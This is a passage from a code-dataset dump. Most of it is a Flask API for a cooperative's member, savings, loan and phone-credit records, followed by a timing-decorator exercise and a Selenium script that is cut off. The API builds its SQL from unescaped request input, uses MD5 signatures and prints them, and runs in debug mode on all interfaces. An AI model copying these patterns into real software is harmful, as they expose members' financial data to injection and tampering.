hashlib.md5(username+password).hexdigest()):\n res_data['response'] = 'NOK'\n res_data['msg'] = 'Invalid Signature!'\n print(data['signature'])\n print(hashlib.md5(username+password).hexdigest())\n return json.dumps(res_data)\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\"SELECT fullname, username, jenis_role FROM `tb_ms_login` where username = '\"+username+\"' and password = '\"+password+\"';\")\n app.logger.info(q_is_exist)\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n if len(rs) < 1:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'Username atau password salah, Mohon cek kembali!!!'\n return json.dumps(res_data)\n fullname = rs[0][0]\n username = rs[0][1]\n jenis_role = rs[0][2]\n if (fullname != None or username != None) :\n res_data['response'] = 'OK'\n res_data['msg'] = 'Success Login!!'\n res_data['fullname'] = fullname\n res_data['jenis_role'] =jenis_role\n app.logger.info(res_data)\n return json.dumps(res_data)\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\n@app.route('/register_anggota', methods=[\"POST\",\"GET\"])\ndef register_anggota():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = data['id_anggota']\n nama = data['nama_anggota']\n ktp = data['ktp']\n alamat = data['alamat']\n telepon = data['telepon']\n petugas = data['insert_by']\n tanggal_registrasi = data['tanggal_registrasi']\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_anggota` where ktp = '\" + ktp + \"';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'KTP Anggota Telah Terdaftar'\n return json.dumps(res_data)\n\n q_insert = (\n \"INSERT INTO `tb_anggota` (tanggal_registrasi, id_anggota, nama_anggota, ktp, alamat, telepon, insert_by, flag_active) values ('\" + tanggal_registrasi + \"','\" + id_anggota + \"','\" + nama + \"','\" + ktp + \"','\" + alamat + \"','\" + telepon + \"','\" + petugas + \"','t');\")\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Anggota berhasil didaftarkan'\n return json.dumps(res_data)\n\n\n@app.route('/inquiry_anggota/', methods=[\"GET\",])\ndef inquiry_anggota(id):\n res_data = {}\n if request.method == 'GET':\n prefix = 'UTI/AGT000'\n id_anggota = prefix + id\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\n \"select `id_anggota`, `nama_anggota`, `ktp`, `alamat`, `telepon`, concat('Rp ',format(`simpanan_wajib`,2)), concat('Rp ',format(`simpanan_pokok`,2)), concat('Rp ',format(`simpanan_suka`,2)), concat('Rp ',format(`simpanan_wajib` + `simpanan_pokok` + `simpanan_suka`,2)) as `saldo`, `insert_by`, `edit_by`, `tanggal_registrasi`, `tanggal_modifikasi` from `db_koperasi`.`tb_anggota` where 1=1\")\n if (id_anggota == 'UTI/AGT0000'):\n sql_inquiry = sql_inquiry + \" and flag_active = 't';\"\n else:\n sql_inquiry = sql_inquiry + \" and id_anggota = '%s';\" % id_anggota\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/modify_anggota', methods=[\"POST\",\"GET\"])\ndef modify_anggota():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = str(data['id_anggota'])\n nama_anggota = str(data['nama_anggota'])\n ktp = str(data['ktp'])\n alamat = str(data['alamat'])\n telepon = str(data['telepon'])\n edit_by = str(data['edit_by'])\n tanggal_modifikasi = str(data['tanggal_modifikasi'])\n old_ktp = str(data['ktp_old'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n if ktp != old_ktp:\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_anggota` where ktp = '\" + ktp + \"' and flag_active = 't';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'KTP Anggota Telah Terdaftar'\n return json.dumps(res_data)\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` SET `nama_anggota` = '\"+nama_anggota+\"', `alamat` = '\"+alamat+\"', `telepon` = '\"+telepon+\"', `edit_by` = '\"+edit_by+\"', `ktp` = '\"+ktp+\"', `tanggal_modifikasi` = '\"+tanggal_modifikasi+\"' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Data Anggota Berhasil diUpdate'\n return json.dumps(res_data)\n\n\n@app.route('/delete_anggota', methods=[\"POST\",\"GET\"])\ndef delete_anggota():\n res_data = {}\n print (request.json)\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = str(data['id_anggota'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` set `flag_active` = 'f' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Anggota Berhasil Dihapus dari sistem'\n return json.dumps(res_data)\n\n\n\n\n# SETORAN\n\n@app.route('/get_id_transaksi_setoran', methods=[\"GET\",])\ndef get_idtransaksi_setoran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_setoran`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/SMP'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\n \"SELECT id_anggota, nama_anggota FROM `tb_anggota` where `flag_active`='t' order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/inquiry_setoran', methods=[\"GET\",])\ndef inquiry_setoran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"select `id_transaksi`, `id_anggota`, `nama_anggota`, `jenis_simpanan`, concat('Rp ',format(`nominal`,2)), concat('Rp ', format(`saldo`,2)), `insert_date`, `insert_by` from `tb_setoran` order by cast(replace(`id_transaksi`,'UTI/SMP','') as UNSIGNED)\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n@app.route('/modify_setoran', methods=[\"POST\",\"GET\"])\ndef modify_setoran():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_transaksi = str(data['id_transaksi'])\n id_anggota = str(data['id_anggota'])\n jenis_simpanan = str(data['jenis_simpanan'])\n nominal = str(data['nominal'])\n edit_by = str(data['insert_by'])\n tanggal_modifikasi = str(data['tanggal_setoran'])\n\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_is_exist = (\n \"select `id_anggota`, `nama_anggota`, `simpanan_wajib`, `simpanan_pokok`, `simpanan_suka`, `simpanan_wajib` + `simpanan_pokok` + `simpanan_suka` as `saldo`, `edit_by`, `tanggal_modifikasi` from `db_koperasi`.`tb_anggota` where 1=1 and `id_anggota` = '\"+id_anggota+\"' and `flag_active` = 't';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n simpanan_wajib = str(rs[0][2])\n simpanan_pokok = str(rs[0][3])\n simpanan_suka = str(rs[0][4])\n saldo = str(rs[0][5])\n nama_anggota = rs[0][1]\n if jenis_simpanan == \"simpanan_suka\":\n simpanan_suka = str(int(simpanan_suka) + int(nominal))\n if jenis_simpanan == \"simpanan_pokok\" :\n simpanan_pokok = str(int(simpanan_pokok) + int(nominal))\n if jenis_simpanan == \"simpanan_wajib\" :\n simpanan_wajib = str(int(simpanan_wajib)+int(nominal))\n lb_setoran = str(int(saldo) + int(nominal))\n\n print (type(id_anggota))\n print (type(simpanan_suka))\n print (type(simpanan_wajib))\n print (type(simpanan_pokok))\n print (type(saldo))\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` SET `simpanan_wajib` = '\"+simpanan_wajib+\"', `simpanan_pokok` = '\"+simpanan_pokok+\"', `simpanan_suka` = '\"+simpanan_suka+\"', `edit_by` = '\"+edit_by+\"', `tanggal_modifikasi` = '\"+tanggal_modifikasi+\"' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n\n q_insert_tb_setoran = (\"INSERT INTO `db_koperasi`.`tb_setoran` ( `id_transaksi`, `id_anggota`, `nama_anggota`, `jenis_simpanan`, `nominal`, `saldo`, `insert_date`, `insert_by` ) VALUES ( '\"+id_transaksi+\"', '\"+id_anggota+\"', '\"+nama_anggota+\"', '\"+jenis_simpanan+\"', '\"+nominal+\"', '\"+lb_setoran+\"', '\"+tanggal_modifikasi+\"', '\"+edit_by+\"' );\")\n print (q_modify)\n curr.execute(q_insert_tb_setoran)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Saldo Berhasil diUpdate'\n return json.dumps(res_data)\n\n\n# PINJAMAN\n\n@app.route('/get_id_transaksi_pinjaman', methods=[\"GET\",])\ndef get_idtransaksi_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_kredit) as jumlah FROM `tb_kredit`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/PNJ'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\"SELECT tb_anggota.id_anggota, tb_anggota.nama_anggota FROM `tb_anggota` where tb_anggota.`flag_active`='t' and tb_anggota.id_anggota not in (select id_anggota from tb_kredit where lunas = 0) order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/register_pinjaman', methods=[\"POST\",\"GET\"])\ndef register_pinjaman():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_transaksi = str(data['id_transaksi'])\n id_anggota = str(data['id_anggota'])\n jumlah_pinjaman = str(data['jumlah_pinjaman'])\n bunga = str(data['bunga_pertahun'])\n tenor = str(data['tenor'])\n angsuran_perbulan = str(data['angsuran_perbulan'])\n flag_active = 't'\n insert_date = str(data['tanggal_setoran'])\n insert_by = str(data['insert_by'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n\n q_check_tb_kredit =()\n\n q_insert_tb_kredit = (\"INSERT INTO `db_koperasi`.`tb_kredit` ( `id_kredit`, `id_anggota`, `jumlah_pinjaman`, `bunga`, `lama_cicilan`, `angsuran`, `flag_active`, `insert_date`, `insert_by` ) VALUES ( '\"+id_transaksi+\"', '\"+id_anggota+\"', '\"+jumlah_pinjaman+\"', '\"+bunga+\"', '\"+tenor+\"', '\"+angsuran_perbulan+\"', '\"+flag_active+\"', '\"+insert_date+\"', '\"+insert_by+\"');\")\n print (q_insert_tb_kredit)\n curr.execute(q_insert_tb_kredit)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pinjaman berhasil diajukan'\n return json.dumps(res_data)\n\n@app.route('/inquiry_pinjaman', methods=[\"GET\",])\ndef inquiry_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"SELECT a.id_kredit, a. id_anggota, b.nama_anggota, concat('Rp ', format(b.saldo,2)), concat('Rp ', format(a.jumlah_pinjaman,2)), concat(a.bunga, '%'), concat(a.lama_cicilan, ' Bulan'), concat('Rp ', format(a.angsuran,2)), a.insert_date, a.insert_by, a.sisa_angsuran, concat('Rp ',format(a.sisa_pinjaman,2)) FROM tb_kredit a JOIN ( SELECT id_anggota, nama_anggota, cast( simpanan_wajib AS SIGNED ) + cast( simpanan_suka AS SIGNED ) + cast( simpanan_pokok AS SIGNED ) saldo FROM tb_anggota ) b ON a.id_anggota = b.id_anggota\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n# PENGAMBILAN\n@app.route('/get_id_transaksi_pengambilan_pinjaman', methods=[\"GET\",])\ndef get_id_transaksi_pengambilan_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_pengambilan) as jumlah FROM `tb_kredit`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/PBL'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\n \"SELECT tb_kredit.id_anggota, tb_anggota.nama_anggota, tb_kredit.jumlah_pinjaman FROM `tb_anggota` join `tb_kredit` on tb_anggota.id_anggota = tb_kredit.id_anggota where tb_kredit.`flag_active`='t' and tb_kredit.id_pengambilan is NULL order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/get_detail_pinjaman/UTI/', methods=[\"GET\",])\ndef get_detail_pinjaman(id_anggota):\n res_data = {}\n if request.method == 'GET':\n id_anggota_ = \"UTI/\"+id_anggota\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT tb_kredit.id_anggota, tb_anggota.nama_anggota, concat('Rp ', format(tb_kredit.jumlah_pinjaman,2)), concat('Rp ', format((simpanan_suka+simpanan_pokok+simpanan_wajib),2)) as saldo, id_kredit FROM `tb_anggota` join `tb_kredit` on tb_anggota.id_anggota = tb_kredit.id_anggota where tb_kredit.`flag_active`='t' and tb_kredit.lunas = 0 and tb_kredit.id_anggota = '\"+id_anggota_+\"' order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['id_anggota'] = rs[0][0]\n res_data['nama_anggota'] = rs[0][1]\n res_data['jumlah_pinjaman'] = rs[0][2]\n res_data['saldo'] = rs[0][3]\n res_data['id_kredit'] = rs[0][4]\n res_data['response'] = 'OK'\n db.close()\n return json.dumps(res_data)\n\n@app.route('/register_pengambilan', methods=[\"POST\",\"GET\"])\ndef register_pengambilan():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n id_transaksi_pengambilan = str(data['id_transaksi_pengambilan'])\n id_transaksi_peminjaman = str(data['id_transaksi_peminjaman'])\n id_anggota = str(data['id_anggota'])\n tanggal_pengambilan = str(data['tanggal_pengambilan'])\n insert_by = str(data['insert_by'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_insert_tb_pengambilan = (\"INSERT INTO `db_koperasi`.`tb_pengambilan` ( `id_transaksi_pengambilan`, `id_transaksi_peminjaman`, `tanggal_pengambilan`, `id_anggota`, `insert_by`) VALUES ( '\"+id_transaksi_pengambilan+\"', '\"+id_transaksi_peminjaman+\"', '\"+tanggal_pengambilan+\"', '\"+id_anggota+\"', '\"+insert_by+\"');\")\n print (q_insert_tb_pengambilan)\n curr.execute(q_insert_tb_pengambilan)\n q_update_tb_kredit = (\"UPDATE `db_koperasi`.`tb_kredit` SET `id_pengambilan` = '\"+id_transaksi_pengambilan+\"', `tanggal_pengambilan` = '\"+tanggal_pengambilan+\"', `update_by` = '\"+insert_by+\"', sisa_pinjaman = jumlah_pinjaman, sisa_angsuran = lama_cicilan WHERE `id_kredit` = '\"+id_transaksi_peminjaman+\"';\")\n print(q_update_tb_kredit)\n curr.execute(q_update_tb_kredit)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pengambilan berhasil dilakukan'\n return json.dumps(res_data)\n\n@app.route('/inquiry_pengambilan', methods=[\"GET\",])\ndef inquiry_pengambilan():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"select a.`id_transaksi_pengambilan`, a.`id_transaksi_peminjaman`, a.`tanggal_pengambilan`, a.`id_anggota`, b.`nama_anggota`,concat('Rp ',format(c.`jumlah_pinjaman`,2)), a.`insert_by` from `db_koperasi`.`tb_pengambilan` a join tb_anggota b on a.id_anggota = b.id_anggota join tb_kredit c on a.`id_transaksi_peminjaman` = c.id_kredit ORDER BY a.tanggal_pengambilan\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n\n# PEMBAYARAN_CICILAN\n@app.route('/get_id_transaksi_pembayaran', methods=[\"GET\",])\ndef get_id_transaksi_pembayaran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_pembayaran) as jumlah FROM `tb_pembayaran`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/ANS'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\"SELECT\\n\" +\n \"\tta.id_anggota, ta.nama_anggota, kr.id_kredit, id_pengambilan\\n\" +\n \"FROM\\n\" +\n \"\t`tb_kredit` kr\\n\" +\n \"\tLEFT JOIN tb_pembayaran pb ON kr.id_kredit = pb.id_kredit\\n\" +\n \"\tJOIN tb_anggota ta on ta.id_anggota = kr.id_anggota\\n\" +\n \"WHERE\\n\" +\n \"\tkr.id_pengambilan IS NOT NULL\\n\" +\n \"\tand kr.lunas = 0\\n\" +\n \"\tGROUP BY ta.id_anggota, ta.nama_anggota, kr.id_kredit, id_pengambilan\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/inquiry_pembayaran', methods=[\"POST\",\"GET\"])\ndef inquiry_pembayaran():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n app.logger.info(\"input :\" + str(data))\n id_kredit = str(data['id_kredit'])\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"SELECT\\n\" +\n \"\tkr.jumlah_pinjaman,\\n\" +\n \"CASE\\n\" +\n \"\t\\n\" +\n \"\tWHEN count( pb.id_kredit ) = 0 THEN\\n\" +\n \"\tADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) \\n\" +\n \"\tWHEN count( pb.id_kredit ) > 0 THEN\\n\" +\n \"\tADDDATE( max( tanggal_pembayaran ), INTERVAL 1 MONTH ) \\n\" +\n \"\tEND AS jatuh_tempo,\\n\" +\n \"\tkr.angsuran,\\n\" +\n \"\tkr.jumlah_pinjaman - (sum(COALESCE(pb.jumlah_pembayaran,0)) - sum(COALESCE(pb.denda,0))) - kr.angsuran sisa_pinjaman,\\n\" +\n \"CASE\\n\" +\n \"\t\t\\n\" +\n \"\t\tWHEN ( count( pb.id_kredit ) = 0 AND ADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) < CURDATE( ) ) \\n\" +\n \"\t\tOR (\\n\" +\n \"\t\t\tcount( pb.id_kredit ) > 0 \\n\" +\n \"\t\t\tAND ADDDATE( max( pb.tanggal_pembayaran ), INTERVAL 1 MONTH ) < CURDATE( ) \\n\" +\n \"\t\t\t) THEN\\n\" +\n \"\t\t\t25000 ELSE 0 \\n\" +\n \"\t\tEND AS denda,\\n\" +\n \"\tCASE\\n\" +\n \"\t\t\t\\n\" +\n \"\t\t\tWHEN (count(pb.id_kredit) = 0 AND ADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) < CURDATE( ) ) \\n\" +\n \"\t\t\tOR (\\n\" +\n \"\t\t\t\tcount( pb.id_kredit ) > 0 \\n\" +\n \"\t\t\t\tAND ADDDATE( max( pb.tanggal_pembayaran ), INTERVAL 1 MONTH ) < CURDATE( ) \\n\" +\n \"\t\t\t\t) THEN\\n\" +\n \"\t\t\t\t25000 + kr.angsuran ELSE kr.angsuran \\n\" +\n \"\t\t\tEND AS jumlah_pembayaran,\\n\" +\n \"\t\tcount(pb.id_kredit) + 1 as pembayaran_ke,\\n\" +\n \"\t\tkr.lama_cicilan - count(pb.id_kredit) -1 as sisa_angsuran\\n\" +\n \"\t\tFROM\\n\" +\n \"\t\t\ttb_kredit kr\\n\" +\n \"\t\t\tLEFT JOIN tb_pembayaran pb ON kr.id_kredit = pb.id_kredit \\n\" +\n \"\t\tWHERE\\n\" +\n \"\t\t\tkr.id_kredit = '\"+id_kredit+\"' \\n\" +\n \"\tGROUP BY\\n\" +\n \"kr.jumlah_pinjaman\")\n\n curr.execute(q)\n rs = curr.fetchone()\n rs_data = {}\n if len(rs) > 0 :\n rs_data[\"response\"] = \"OK\"\n rs_data[\"jumlah_pinjaman\"] = str(rs[0])\n rs_data[\"jatuh_tempo\"] = str(str(rs[1]))\n rs_data[\"angsuran\"] = str(rs[2])\n rs_data[\"sisa_pinjaman\"] = int(rs[3])\n if int(rs[7]) == 0 :\n rs_data[\"sisa_pinjaman\"] = 0\n rs_data[\"denda\"] = str(rs[4])\n rs_data[\"jumlah_pembayaran\"] = str(rs[5])\n rs_data[\"pembayaran_ke\"] = str(rs[6])\n rs_data[\"sisa_angsuran\"] = int(rs[7])\n else :\n rs_data[\"response\"] = 'NOK'\n return json.dumps(rs_data)\n\n\n@app.route('/bayar_cicilan', methods=[\"POST\",\"GET\"])\ndef bayar_cicilan():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n app.logger.info(\"input :\" + str(data))\n id_pembayaran = data[\"id_pembayaran\"]\n id_anggota = data[\"id_anggota\"]\n tanggal_pembayaran = data[\"tanggal_pembayaran\"]\n denda = data[\"denda\"]\n tanggal_tempo_pembayaran = data[\"tanggal_tempo_pembayaran\"]\n jumlah_pembayaran = data[\"jumlah_pembayaran\"]\n sisa_pinjaman = data[\"sisa_pinjaman\"]\n id_kredit = data[\"id_kredit\"]\n angsuran_ke = data[\"angsuran_ke\"]\n sisa_angsuran = data[\"sisa_angsuran\"]\n insert_by = data[\"insert_by\"]\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"INSERT INTO `db_koperasi`.`tb_pembayaran` ( `id_pembayaran`, `id_anggota`, `tanggal_pembayaran`, `denda`, `tanggal_tempo_pembayaran`, `jumlah_pembayaran`, `sisa_pinjaman`, `id_kredit`, `angsuran_ke`, `sisa_angsuran`, `insert_by` )\\n\" +\n \"VALUES\\n\" +\n \"\t( '\"+id_pembayaran+\"', '\"+id_anggota+\"', '\"+tanggal_pembayaran+\"', \"+denda+\", '\"+tanggal_tempo_pembayaran+\"', \"+jumlah_pembayaran+\", \"+sisa_pinjaman+\", '\"+id_kredit+\"', \"+angsuran_ke+\", \"+sisa_angsuran+\", '\"+insert_by+\"' )\")\n curr.execute(q)\n if int(sisa_angsuran) != 0 :\n lunas = '0'\n else :\n lunas = '1'\n sisa_angsuran = '0'\n sisa_pinjaman = '0'\n\n q_update = (\"update tb_kredit set sisa_pinjaman = \"+sisa_pinjaman+\", sisa_angsuran = \"+sisa_angsuran+\", lunas = \"+lunas+\" where id_kredit = '\"+id_kredit+\"'\")\n curr.execute(q_update)\n db.commit()\n res_data = {}\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pembayran Cicilan berhasil dilakukan'\n return json.dumps(res_data)\n\n\n\n\n\n# INPUT PENJUALAN PULSA\n\n@app.route('/penjualan_pulsa_get_id', methods=[\"GET\",])\ndef penjualan_pulsa_get_id():\n now = datetime.datetime.now()\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id),CURDATE() FROM `tr_transaksi` where date(`timestamp`) = CURDATE();\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n now = now.strftime(\"%Y%m%d\")\n res_data['response'] = 'OK'\n res_data['msg'] = 'P'+ now + str(jumlah_row+1)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/get_operator_denom_by_prefix', methods=[\"POST\",\"GET\"])\ndef get_operator_denom_by_prefix():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n print(\"input :\" + str(data))\n no_hp = str(data['no_hp'])\n prefix = no_hp[0:4]\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"select ms_prefix.nama_operator, ms_produk.nama_produk from ms_prefix left join ms_produk on ms_prefix.nama_operator = ms_produk.nama_operator where ms_prefix.prefix = '\"+prefix+\"';\")\n print (q)\n curr.execute(q)\n rs = curr.fetchall()\n rs_data = {}\n if len(rs) > 0 :\n rs_data[\"response\"] = \"OK\"\n rs_data[\"nama_operator\"] = rs[0][0]\n denom_arr =[]\n for denom in rs:\n denom_arr.append(denom[1])\n rs_data[\"denom_arr\"] = denom_arr\n else :\n rs_data[\"response\"] = 'NOK'\n return json.dumps(rs_data)\n\n@app.route('/input_penjualan_pulsa', methods=[\"POST\",\"GET\"])\ndef input_penjualan_pulsa():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n tanggal_registrasi = data['tanggal_registrasi']\n id_transaksi = data['id_transaksi']\n operator = data['operator']\n no_hp = data['no_hp']\n denom = data['denom']\n catatan = data['catatan']\n tipe_transaksi = 'pembelian_pulsa'\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q = (\"SELECT id_produk, harga_beli, harga_jual, keuntungan FROM ms_produk WHERE nama_produk = '\"+denom+\"';\")\n print(q)\n curr.execute(q)\n rs = curr.fetchall()\n rs_data = {}\n id_product = harga_beli = harga_jual = keuntungan = ''\n if len(rs) > 0:\n id_product = str(rs[0][0])\n harga_beli = str(rs[0][1])\n if harga_beli == None or harga_beli == 'None':\n harga_beli = '0'\n harga_jual = str(rs[0][2])\n if harga_jual == None or harga_jual == 'None':\n harga_jual = '0'\n keuntungan = str(rs[0][3])\n if keuntungan == None or keuntungan == 'None':\n keuntungan = '0'\n q_insert = (\"insert into tr_transaksi (id_transaksi, tipe_transaksi, id_product, no_hp, harga_beli, harga_jual, keuntungan, timestamp) values ('\"+id_transaksi+\"', '\"+tipe_transaksi+\"',\"+id_product+\" ,'\"+no_hp+\"', '\"+harga_beli+\"', '\"+harga_jual+\"', '\"+keuntungan+\"', '\"+tanggal_registrasi+\"');\")\n print(q_insert)\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Transaksi Sukses'\n return json.dumps(res_data)\n\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\nif __name__ == '__main__':\n handler = RotatingFileHandler('/var/log/api-koperasi/API_KOPERASI.log', maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.run(host='0.0.0.0', port=5000, threaded=True, debug=True)\n # app.run(host='127.0.0.1', port=5000, threaded=True, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"368093305","text":"import functools\nimport time\n\n\ndef timeit(func):\n @functools.wraps(func)\n def inner(*args, **kwargs):\n time_before = time.time()\n return_value = func(*args, **kwargs)\n print(f'Execution time for {func.__name__} with args={args} and kwargs={kwargs}:',\n time.time() - time_before)\n return return_value\n return inner\n\n\n@timeit\ndef long_exec_time(lim1, lim2):\n s = 0\n for i in range(lim1):\n for j in range(lim2):\n s += i * j\n return s\n\n\nif __name__ == '__main__':\n s1 = long_exec_time(2000, 2000)\n s2 = long_exec_time(5000, 5000)\n print(s1, s2)\n","sub_path":"solutions/day4_decorators.py","file_name":"day4_decorators.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"644681627","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains \n\ndriver = webdriver.Chrome('c:\\\\pf\\\\bin\\\\chromedriver.exe') \n# Optional argument, if not specified will search path.\n#driver = webdriver.Chrome()\ndriver.get('file://C:/work/git/nodejs-sky/selenium-basics/practice_page.html')\n# create action chain object \naction = ActionChains(driver) \n\nfirst_name = driver.find_element_by_id(\"firstname\")\nfirst_name.send_keys(\"samuel elijah\")\nlast_name = 